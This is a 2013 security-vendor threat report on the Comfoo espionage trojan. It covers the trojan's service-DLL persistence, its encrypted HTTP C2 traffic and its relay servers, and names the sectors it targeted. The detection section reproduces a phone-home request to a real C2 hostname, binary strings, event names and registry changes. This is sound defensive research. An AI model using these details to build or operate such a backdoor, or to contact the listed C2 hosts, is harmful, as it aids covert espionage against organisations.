Author: Joe Stewart and Don Jackson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence

Joe Stewart and Don Jackson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence Date: 31 July 2013





Introduction

The details of organized cyber-espionage campaigns are becoming more public. So-called "Advanced Persistent Threat" (APT) attacks are common news as individuals and corporations discover the data on their hard drives is part of a country or competitor's "shopping list." The actors behind these attacks are generally well-equipped in terms of training, finances, and access to resources. The missions of APT threat actors are usually of strategic importance, and the actors exercise virtually unlimited patience in penetrating and persisting inside their specific target's network until they accomplish their goals.

One of the universal aspects of APT attacks is the use of malicious software tools that grant unauthorized backdoor access to computer systems inside the targeted network. Because maintaining a beachhead inside the network is often critical to mission success, threat actors must adapt to various network configurations and changes in defenses by choosing and deploying backdoors with specific functionality and features. It is difficult to be persistent without at least one backdoor. Threat actors often possess and use an arsenal of remote access trojans (RATs) to siphon data from their targets. Persistence requires malware, and the top cyber-espionage actors have hundreds of RATs at their disposal at any given time. Understanding the choice and usage of tools can be the keys to identifying and tracking APTs.

Dell SecureWorks researchers have identified and classified more than 200 distinct malware families used by various APT groups. Some malware is specially configured off-the-shelf software, and some malware is customized source code of an existing RAT. However, most malware families are proprietary, developed by the APT groups as weapons to be deployed against a variety of targets. Accurate identification and classification of this malware by antivirus (AV) companies is sparse. Shared code, the use of common tools, co-infections, and a history of generic or incorrect classification by multiple names make the automated tracking of these tools by AV companies difficult. This inaccuracy can be detrimental when designing defenses based on specific threat indicators. Tracking APTs requires a dedicated malware intelligence effort. One way applied malware intelligence is used to discover new APT trojans is a recursive investigative method: Malware -> Infrastructure Touchpoints -> New Malware -> and so on.

Cyber-espionage actors often cycle through different RATs over a period of years. The Dell SecureWorks Counter Threat Unit™ (CTU) research team has tracked a RAT known as "Comfoo" that has been in continuous development since at least 2006. This RAT has maintained a fairly low profile, even though it was used as part of the RSA breach in 2010, when its code was first analyzed. Antivirus firm Trend Micro briefly mentioned its use in a 2012 paper titled "Luckycat Redux — Inside an APT Campaign with Multiple Targets in India and Japan." However, the disclosure of this trojan and some of its command and control (C2) infrastructure did not discourage its continued use by the threat actors responsible for it.

Comfoo characteristics

To maintain persistence on the system, Comfoo usually replaces the path to the DLL of an existing unused service rather than installing a new service. A new service is more likely to be noticed by system audits. Sometimes Comfoo is delivered with a rootkit that hides Comfoo's files on disk. Additionally, Comfoo starts the existing "ipnat" system service. This action causes remote inbound connections to the infected system to fail, blocking remote maintenance by the network administrator.

Network behavior

Comfoo's network traffic is encrypted and encapsulated in HTTP requests and responses, although some variants skip the encapsulation step. Payloads are encrypted by a 10-byte static XOR key that is hard-coded inside the Comfoo binary. Initial login data from the infected system (MAC address, internal IP address, campaign tag, and version data) is passed in the request URI and is additionally encrypted by a dynamic key, as shown in Figure 1.



Figure 1. Comfoo URL decryption algorithm example. (Source: Dell SecureWorks)

Capabilities

The Comfoo RAT has the following features:

System/network information gathering

Keystroke logging

Screenshots

File upload/download/execute

Command shell





Comfoo trojan C2 software discovery

By studying the network traffic of infected systems, CTU researchers determined that the server side of the Comfoo malware sends an HTTP server header identifying the server version as "Apache 2.0.50 (Unix)". However, the rest of the HTTP headers do not match the order or the formatting used by this version of Apache. This anomaly suggests that the C2 software was a standalone application instead of a series of scripts running under Apache. Searching for the specific server version string in the CTU malware repository produced a sample of the Comfoo server software, identified by the MD5 hash 2b29f0224b632fdd00d0a30527b795b7.

Analysis

The Comfoo C2 server turns out to be a rendezvous-type traffic relay program. This small binary can be deployed on rented or hacked Windows systems, where it passes traffic between Comfoo victims and the Comfoo master console operated by the threat actors (see Figure 2).



Figure 2. Organization of rendezvous-type traffic relay program. (Source: Dell SecureWorks)

Unlike "dumb" traffic relay servers such as HTran, the Comfoo relay server does not know the location of the master console. Instead, the master console program connects to the relay server on-demand, and any incoming victim data is passed to the master console connection. HTran is sometimes used to add an additional layer of untraceability to the victim connection. Likewise, the administrator can add other layers of proxies or VPN connections to the console connection side of the communication.

The Comfoo relay server listens on up to three TCP ports at a time. The first port acts as a control and typically listens on port 1688. It performs the following tasks:

Enables/disables the other ports

Accepts new relay port configuration (stored in rlycfg.dll)

Notifies master console that a new victim connection is available





The second port is the admin relay port, which typically listens on port 1689. It accepts connections from the master console to send commands to and receive data from victims' systems. The third port is the victim relay port, which listens on a configurable port number, usually port 80 or port 443. This port accepts connections from victims' systems to send data to and receive commands from the Comfoo administrator encapsulated in HTTP requests and responses. If there is no current connection between the victim and the Comfoo administrator, Comfoo logs the victim's connection and sends an idle response to the victim.

DNS resolution tactics

In addition to using rendezvous protocols and HTran forwarding servers, Comfoo operators create and maintain another layer of obfuscation to thwart analysis of their infrastructure. Like many other APT malware families, Comfoo reaches out to its masters based on DNS lookups of certain hostnames. The Comfoo operators commonly use dynamic DNS providers to micromanage the IP addresses to which Comfoo hostnames resolve. While Comfoo sleeps, its operators often set those IP addresses to common or bogus entries. When not being used to actively control Comfoo, the C2 domain name might resolve to the address of a popular search engine or a local loopback (127.0.0.1), private (10.1.1.1), or other special use (0.0.0.0) IP address. Domain names used in Comfoo operations only point to actual control infrastructure during very short time windows. Only during these time windows do alerts from a DNS monitoring tool inform researchers when it might be possible to locate an actual Comfoo server. Figure 3 maps IP addresses used in Comfoo campaigns.



Figure 3. Geolocation plot of all public routable IP addresses resolved from a set of Comfoo C2 hostnames, including bogus distractors. (Source: Dell SecureWorks)

The map in Figure 4 shows only the IP addresses that actually speak Comfoo's protocol, illustrating how DNS tactics such as the distractor IP addresses can mask actual control infrastructure.



Figure 4. Geolocation plot of actual IP addresses used for Comfoo C2 servers. (Source: Dell SecureWorks)

Taking control

The unauthenticated nature of the Comfoo relay server's administrative connections makes it possible to take control of the C2 server and all victims' systems, armed only with knowledge of the protocol, the encryption method, and the static encryption key hard-coded into every Comfoo binary. Researchers can passively monitor victims' logins to the relay servers (sending no commands) by connecting to the correct port on the correct IP address at the right time. This technique is analogous to viewing webserver log data stored in a publicly accessible directory on a C2 server.

To help identify and notify victims of Comfoo-based espionage, CTU researchers set up a passive monitoring system for dozens of active Comfoo C2 relays and have been running this system since January 2012. Connections from the monitoring system are periodic, so not all victim logins are observed. Only the initial connection data is logged, and it is not possible to see data being exfiltrated from victims' networks using this method.

Passive monitoring results

While monitoring Comfoo, CTU researchers detected more than 200 variants of the trojan and 64 different campaign tags used by the threat actors to organize their campaigns. Numerous government entities and private companies based in the United States, Europe, and Asia Pacific had Comfoo-infected computers phoning home to the Comfoo C2 infrastructure (see Figure 5).



Figure 5. Geographic location of Comfoo victim organizations. (Source: Dell SecureWorks)

Much of the traffic emanated from multiple Japanese and Indian government ministries. CTU researchers outlined the Japanese attack campaign in a previous analysis entitled Chasing APT. The following industries were also targeted:

Education

Energy

Mineral exploration

News media

Semiconductors

Steel manufacturing

Think tanks

Telecommunications

Trade organizations

Audio and videoconferencing products





The targeting of audio and videoconferencing products is unusual. CTU researchers speculate that the threat actors might be looking for intellectual property relating to audio and videoconferencing. Another possibility is that it could be a clever and stealthy way of listening and watching activities of both commercial and government organizations.

Detecting Comfoo in the enterprise

The presence of Comfoo on a network or computer can be detected in a variety of ways, even if AV engines lack detection for the latest variants. Analysts can search for known Comfoo threat indicators in network traffic, on hard drives, in memory, or in the Windows registry.

Network detection

A typical Comfoo HTTP phone-home request looks like the following:

GET /CWoNaJLBo/VTNeWw11212/12664/12VTNfNmM1aQ/UTWOqVQ132/ HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Accept-Language: en-enUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)Host: smtp.dynamiclink.ddns.usConnection: Keep-AliveCache-Control: no-cache

An active C2 server responds with headers similar to the following:

HTTP/1.1 200 OKDate: Mon, 29 Jul 2013 19:26:15 GMTServer: Apache/2.0.50 (Unix)Content-Length: 10Keep-Alive: timeout=15, max=90

Disk/memory/registry detection

The unique string T1Y943jIhk can be found in the Comfoo binary. Offline forensic analysis may be required to search for this string if a rootkit is in play.

These additional strings can be searched but are not guaranteed to be unique to Comfoo:

CPUSpeed:%d.%dGHz

CPUNameString:%s

CPUVendorIdentifier:%s

CPUIdentifier:%s

No %d CPU Information:

SystemCurrent Time:

systemBoot Time:

IE BHO Name:%s

11. IE BHO Information!

10. IE Version Information!

9. InstallApp Information!

8. NETBIOS Information!

7. Protocol Information!

6. NET Information!

5. Disk Information!

4. Account Information!

3. System Time!

2. CPU Type!

Can not get this information, error code is %d.

Windows Version Information!





Additionally, Comfoo uses the SetEvent Windows API and registers an event that frequently contains the word "GAME". The following are example Comfoo event names:

exclusiveinstance12

THIS324NEWGAME

MYGAMEHAVESTART

MYGAMEHAVEstarted

MYGAMEHAVESTARTEd

MYGAMEHAVESTARTED

thisisanewfirstrun

THISISASUPERNEWGAMENOWBEGIN

thisisnewtrofor024





To persist without adding new registry entries, Comfoo edits an unused system service configuration, replacing the DLL path and setting it to auto-start on boot. For example, a system service registry key entry changed by Comfoo might resemble the following:

system\CurrentControlSet\Services\Netman\Parameters

Original: "ServiceDll" => "%SystemRoot%\System32

etman.dll"

Modified: "ServiceDll" => "C:\WINDOWS\system32\tabcteng.dll"

system\CurrentControlSet\Services\Netman

Original: "Start" => "3"

Modified: "Start" => "2"





Comfoo hijacks service settings for some legitimate service DLLs:

netman.dll

rasauto.dll

sens.dll





The following are DLL names commonly used by Comfoo:

cmmos.dll

jacpet.dll

javadb.dll

mszlobm.dll

netfram.dll

netman.dll

ntdapie.dll

ntdelu.dll

ntobm.dll

odbm.dll

senss.dll

suddec.dll

tabcteng.dll

vmmreg32.dll

wininete.dll





If Comfoo successfully connects to the relay server and receives commands from the master console, then it creates a file named "mstemp.temp" on the infected system to store the output of the last shell command.

Conclusion

Comfoo is the tip of an iceberg. The CTU research team notified many Comfoo victims, either directly or through the computer security incident response teams (CSIRTs) in their respective country. Analysis was also shared with law enforcement. Based on the number of campaign tags observed in malware samples versus those seen in live monitoring by the CTU research team, there are likely hundreds more unidentified victims.

Most businesses will never see a Comfoo infection. However, evaluating whether an organization is a potential target of cyber-espionage is important in any risk evaluation. Chief information security officers should maintain awareness of any reported cyber-espionage threats in their business sector. If one player in an industry is targeted, it is likely all major players (or newcomers with interesting technology) in that industry will be targets at some point.

Organizations compromised by Comfoo (or most types of APT malware) likely face a major forensic and eradication effort. This effort should be followed by a major investment in security measures to keep cyber-espionage actors out of the network. Many in-house security teams do not have the APT expertise to respond to a persistent threat that requires a persistent, active, and layered defense model spanning the entire attack surface of an organization. As a result, the organization might need outside expertise to effectively mitigate these types of threats.

Appendix: Comfoo hostnames for blacklisting consideration